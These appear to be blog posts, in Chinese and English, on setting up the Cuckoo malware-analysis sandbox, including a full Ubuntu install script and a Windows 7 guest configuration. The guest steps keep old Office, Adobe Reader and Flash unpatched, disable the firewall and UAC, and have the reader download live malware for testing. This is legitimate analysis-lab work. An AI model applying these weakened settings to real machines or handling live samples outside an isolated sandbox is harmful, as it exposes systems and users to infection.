2)在cuckoo\web目錄下執行./manage.py runserver



Step3:上載惡意程式測試看看囉

先到惡意程式分享網站上下載一隻來測試看看



打開firefox 輸入127.0.0.1:8000



可以看到成功上載,並開始分析了



當系統分析完成後,網頁就會顯示reported,請點選該惡意程式的MD5欄位就可以看分析報告




以上就是個人測試與安裝的過程,提供各位試試囉。

How to Install Cuckoo Sandbox? [Step2]

Install VirtualBox on Window7

1. Install Windows 7 OS (Don't Update !)

2.Install Office 2003 or 2010 (Don't Update !)

3.Install AdbeRdr9.exe (Don't Update !)

4.Install flash-player9.msi  (Don't Update !) 

5.shutdown firewall and UAC 
 


6.shutdown[OS][office][Adobe] auto update function


7. Install  Python 2.7 (注意要將python加入作業系統PAHT環境變數)


9.安裝 cuckoo agent.py 到自動啟動目錄修改 agent.py檔名成agent.pyw
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup


10.關閉網路自動探測功能
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NlaSvc\Parameters\Internet
直接把EnableActiveProbing1改成0

 


11.關閉Teredo IPv6 Tunneling in Microsoft Windows功能
Open a command prompt with administrator privileges
(Start->Accessories->right click on Command Prompt,
choose Run as Administrator):
C:\netsh interface teredo set state disabled [Enter]
 

12.設定網路環境
1)在ubuntu下到cuckoo目錄下執行 sudo ./udate_ip_tables.sh



2)在ubuntu下開啟Virtualbox 網路設定,新增一組HostOnly的網路介面 [vboxnet0]











3)在ubuntu下開啟虛擬機的網路設定,使用HostOnly的網路介面 [vboxnet0]

虛擬機的網路設定如下圖


4)測試ubuntu與虛擬機間的網路是否正常 
 ubuntu:  Ping 192.168.56.101
 vm: Ping 192.168.56.1
        Ping www.google.com



5)當vm的設定與測試都正常後,請將虛擬機儲存一個 [snapshot] <==很重要、很重要、很重要




How to Install Cuckoo Sandbox? [Step1]

Install All Packages dependencies and libraries

Step1: update

$ sudo apt-get update 


Step2: Install the dependencies and libraries

$ sudo apt-get install -y python python-pip python-dev python-sqlalchemy python-dpkt python-jinja2 python-magic python-pymongo python-libvirt subversion git build-essential git libpcre3 libpcre3-dev libpcre++-dev python-bottle libffi-dev libssl-dev libxml2-dev libxslt-dev libxslt1-dev libjpeg-dev libfuzzy-dev ssdeep  autoconf automake libtool make gcc 


Step3: Upgrade pip-9.0.1-py2.py3-none-any.whlc

$ sudo pip install --upgrade pip
$ sudo pip install -U pip setuptools


Step4: Install Pefile Python Modulec

$ wget https://github.com/erocarrera/pefile/files/192316/pefile-2016.3.28.tar.gz
$ tar zxvf pefile-2016.3.28.tar.gz
$ cd pefile-2016.3.28/
$ sudo python setup.py build
$ sudo python setup.py install
$ cd ..


Step5: Install pydeept Python Module

$ git clone https://github.com/kbandla/pydeep.git pydeep
$ cd pydeep
$ sudo python setup.py build
$ sudo python setup.py install
$ cd ..


Step6: Install jasson-2.10

$ wget http://www.digip.org/jansson/releases/jansson-2.10.tar.gz
$ tar zxvf jansson-2.10.tar.gz
$ cd jansson-2.10/
$ ./configure
$ make
$ sudo make install
$ cd ..


Step7: Install swing-3.0.12

$ wget http://downloads.sourceforge.net/swig/swig-3.0.12.tar.gz
$ tar zxvf swig-3.0.12.tar.gz
$ cd swig-3.0.12/
$ ./configure
$ make
$ sudo make install
$ cd ..



Step8: Install M2Crypto==0.24.0

$ wget https://pypi.python.org/packages/58/75/362faac80a1bc2742b4b696dc350518312043d568bfd2687a9270f18da88/M2Crypto-0.24.0.tar.gz#md5=8e87235942c76d1ba9f999ee33764fdb
$ tar zxvf M2Crypto-0.24.0.tar.gz
$ cd M2Crypto-0.24.0/
$ sudo python setup.py build
$ sudo python setup.py install
$ cd ..



Step9: \Install YARA 3.5

$ sudo apt-get install -y flex bison
$ wget https://github.com/VirusTotal/yara/archive/v3.5.0.tar.gz
$ tar xvfz v3.5.0.tar.gz
$ cd yara-3.5.0/
$ ./bootstrap.sh
$ ./configure --enable-cuckoo --enable-magic
$ make
$ sudo make install



Step10: Install Tcpdump

$ sudo apt-get -y install tcpdump libpcap-dev
$ sudo setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
$ getcap /usr/sbin/tcpdump


Step11:  "Create ip_tables.sh"

$ echo '#!/bin/bash' >update_ip_tables.sh
$ echo 'iptables -A FORWARD -o eth0 -i vboxnet0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT' >> update_ip_tables.sh
$ echo 'iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT' >> update_ip_tables.sh
$ echo 'iptables -A POSTROUTING -t nat -j MASQUERADE' >> update_ip_tables.sh
$ echo 'sysctl -w net.ipv4.ip_forward=1' >> update_ip_tables.sh
$ chmod +x ./update_ip_tables.sh
$ sudo ./update_ip_tables.sh


Step12:  "Install Dnsmasq"
$ sudo apt-get install -y dnsmasq
$ sudo service dnsmasq start


Step13: "Install volatility、MongoDB、tesseract-oct"
$ sudo apt-get install -y volatility mongodb tesseract-ocr



Step 14: "Install Cuckoo Sandbox"
$ git clone https://github.com/cuckoosandbox/cuckoo


Step 15:  "Install Cuckoo Sandbox requirement modules"
$ cd cuckoo/
$ sudo -H pip install -r requirements.txt


Step16: "Install Cuckoo Sandbox utilitys"
$ cd utils/
$ ./community.py -a -f -w



Step17:  "Install Install Oracle VM VirtualBox"
$ sudo sh -c 'echo "deb http://download.virtualbox.org/virtualbox/debian xenial contrib" >> /etc/apt/sources.list.d/virtualbox.list'
$ wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -
$ wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -
$ sudo apt update && sudo apt-get -y install virtualbox-5.1


Step18: "Install Install Oracle VM VirtualBox Extension Pack"
$ wget http://download.virtualbox.org/virtualbox/5.1.18/Oracle_VM_VirtualBox_Extension_Pack-5.1.18-114002.vbox-extpack
$ VBoxManage extpack install Oracle_VM_VirtualBox_Extension_Pack-5.1.18-114002.vbox-extpack



Step19 : "Add cuckoo to Vboxusers Grops"
$ sudo usermod -aG vboxusers cuckoo


========================================================================
install.sh
#!/bin/bash

mkdir install_tmp
cd install_tmp/

echo "====================================="
echo "Ubuntu Packages Update"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get update 

echo "====================================="
echo "Install the dependencies and libraries"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get install -y python python-pip python-dev python-sqlalchemy python-dpkt python-jinja2 python-magic python-pymongo python-libvirt subversion git build-essential git libpcre3 libpcre3-dev libpcre++-dev python-bottle libffi-dev libssl-dev libxml2-dev libxslt-dev libxslt1-dev libjpeg-dev libfuzzy-dev ssdeep  autoconf automake libtool make gcc 

echo ""
echo ""
echo "====================================="
echo "Upgrade pip-9.0.1-py2.py3-none-any.whlc"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo pip install --upgrade pip
sudo pip install -U pip setuptools

echo ""
echo ""
echo "====================================="
echo "Install Pefile Python Module"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
wget https://github.com/erocarrera/pefile/files/192316/pefile-2016.3.28.tar.gz
tar zxvf pefile-2016.3.28.tar.gz
cd pefile-2016.3.28/
sudo python setup.py build
sudo python setup.py install
cd ..

echo ""
echo ""
echo "====================================="
echo "Install pydeept Python Module"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
git clone https://github.com/kbandla/pydeep.git pydeep
cd pydeep
sudo python setup.py build
sudo python setup.py install
cd ..

echo ""
echo ""
echo "====================================="
echo "Install jasson-2.10"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
wget http://www.digip.org/jansson/releases/jansson-2.10.tar.gz
tar zxvf jansson-2.10.tar.gz
cd jansson-2.10/
./configure
make
sudo make install
cd ..

echo ""
echo ""
echo "====================================="
echo "Install swing-3.0.12"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
wget http://downloads.sourceforge.net/swig/swig-3.0.12.tar.gz
tar zxvf swig-3.0.12.tar.gz
cd swig-3.0.12/
./configure
make
sudo make install
cd ..

echo ""
echo ""
echo "====================================="
echo "Install M2Crypto==0.24.0"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
wget https://pypi.python.org/packages/58/75/362faac80a1bc2742b4b696dc350518312043d568bfd2687a9270f18da88/M2Crypto-0.24.0.tar.gz#md5=8e87235942c76d1ba9f999ee33764fdb
tar zxvf M2Crypto-0.24.0.tar.gz
cd M2Crypto-0.24.0/
sudo python setup.py build
sudo python setup.py install
cd ..

echo ""
echo ""
echo "====================================="
echo "Install YARA 3.5"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get install -y flex bison
wget https://github.com/VirusTotal/yara/archive/v3.5.0.tar.gz
tar xvfz v3.5.0.tar.gz
cd yara-3.5.0/
./bootstrap.sh
./configure --enable-cuckoo --enable-magic
make
sudo make install

cd ~

echo ""
echo ""
echo "====================================="
echo "Install Tcpdump"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get -y install tcpdump libpcap-dev
sudo setcap cap_net_raw,cap_net_admin=eip /usr/sbin/tcpdump
getcap /usr/sbin/tcpdump

echo ""
echo ""
echo "====================================="
echo "Create ip_tables.sh"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
echo '#!/bin/bash' >update_ip_tables.sh
echo 'iptables -A FORWARD -o eth0 -i vboxnet0 -s 192.168.56.0/24 -m conntrack --ctstate NEW -j ACCEPT' >> update_ip_tables.sh
echo 'iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT' >> update_ip_tables.sh
echo 'iptables -A POSTROUTING -t nat -j MASQUERADE' >> update_ip_tables.sh
echo 'sysctl -w net.ipv4.ip_forward=1' >> update_ip_tables.sh
chmod +x ./update_ip_tables.sh
sudo ./update_ip_tables.sh

echo ""
echo ""
echo "====================================="
echo "Install Dnsmasq"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get install -y dnsmasq
sudo service dnsmasq start

echo ""
echo ""
echo "====================================="
echo "Install volatility,MongoDB,tesseract-oct"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo apt-get install -y volatility mongodb tesseract-ocr


echo ""
echo ""
echo "====================================="
echo "Install Cuckoo Sandbox"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
git clone https://github.com/cuckoosandbox/cuckoo

echo ""
echo ""
echo "====================================="
echo "Install Cuckoo Sandbox requirement modules"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
cd cuckoo/
sudo -H pip install -r requirements.txt

echo ""
echo ""
echo "====================================="
echo "Install Cuckoo Sandbox utilitys"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
cd utils/
./community.py -a -f -w
echo ""
echo ""
echo "Cuckoo Sandbox Installed!"
cd ~

cd install_tmp/
echo ""
echo ""
echo "====================================="
echo "Install Install Oracle VM VirtualBox"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo sh -c 'echo "deb http://download.virtualbox.org/virtualbox/debian xenial contrib" >> /etc/apt/sources.list.d/virtualbox.list'
wget -q https://www.virtualbox.org/download/oracle_vbox_2016.asc -O- | sudo apt-key add -
wget -q https://www.virtualbox.org/download/oracle_vbox.asc -O- | sudo apt-key add -
sudo apt update && sudo apt-get -y install virtualbox-5.1

echo ""
echo ""
echo "====================================="
echo "Install Install Oracle VM VirtualBox Extension Pack"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
wget http://download.virtualbox.org/virtualbox/5.1.18/Oracle_VM_VirtualBox_Extension_Pack-5.1.18-114002.vbox-extpack
VBoxManage extpack install Oracle_VM_VirtualBox_Extension_Pack-5.1.18-114002.vbox-extpack

cd ~
echo ""
echo ""
echo "====================================="
echo "Add cuckoo to Vboxusers Grops"
echo "====================================="
read -rsp $'Press [Enter] key to continue....\n'
sudo usermod -aG vboxusers cuckoo
echo ""
echo ""
echo "==========================================="
echo "                Finished!!                 "
echo "==========================================="
sudo rm -fr install_tmp/



用APNIC找出台灣所有的IP位址